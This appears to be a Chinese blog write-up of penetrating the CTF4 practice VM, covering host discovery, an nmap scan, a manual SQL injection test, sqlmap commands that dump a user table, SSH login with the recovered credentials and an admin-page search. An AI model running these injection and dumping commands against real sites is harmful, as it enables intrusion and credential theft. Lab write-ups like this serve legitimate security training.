CTF4靶机渗透

环境搭建

攻击机:kali
靶机:CTF4
CTF4靶机靶机下载 点击直接下载.
Tips:首次打开虚拟机时要选择“我已移动该虚拟机”选项。
此次训练其中一步为获取目标的账号密码,故目标环境无需登录。
两台机器环境kali和ctf4 都设置为NAT模式

实战演练

主机发现

kali的IP:192.168.99.132
在这里插入图片描述使用netdiscover命令寻找ctf4的IP:

netdiscover -r 192.168.99.0/24

扫描结果如下:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210126125254589.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMzUxMjky,size_16,color_FFFFFF,t_70

端口扫描

nmap 192.168.99.141 -v -sV

默认扫描1-1000端口
-v显示扫描细节
-sV显示版本信息
在这里插入图片描述22、25、80、631端口开放
使用浏览器访问一下ctf4:
![在这里插入图片描述](https://img-blog.csdnimg.cn/20210126125638129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQzMzUxMjky,size_16,color_FFFFFF,t_70

寻找突破点

查看了各个网页发现在Blog中存在SQL注入点

在这里插入图片描述点后链接改变出现id参数:
在这里插入图片描述加一个 ’
看看是否存在sql注入,发现网页返回报错,并且报了目录:
在这里插入图片描述改变id值=3时无法访问该页面:
在这里插入图片描述改变 id=3 or 1=1# 后可以访问
在这里插入图片描述由此找到一个sql注入点,利用sqlmap进行利用

sqlmap进行漏洞利用

sql注入漏洞探测
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id

在这里插入图片描述存在布尔注入和时间报错注入

爆库名
oot@kali:~# sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id --dbs

在这里插入图片描述

爆表名
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id -D ehks --tables

在这里插入图片描述

脱库
sqlmap -u "http://192.168.99.141/index.html?page=blog&title=Blog&id=3" -p id -D ehks -T user --dump

在这里插入图片描述爆出了用户名和密码

使用ssh登录

使用dstevens用户登录
在这里插入图片描述尝试提权,居然成功了,太low了
在这里插入图片描述在这里插入图片描述

寻找后台

使用dirbuster寻找网站的一些二级目录:
在这里插入图片描述扫到amdin/login.php
在这里插入图片描述在浏览器中输入如下ulr,进入了后台登录界面,输入爆破的用户名和密码即可进入后台管理。
在这里插入图片描述在这里插入图片描述可以上传文字,可能存在xss等漏洞

其他的一些利用

发现可以包含文件,可进一步发掘文件包含漏洞
在这里插入图片描述结束

  • 0
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值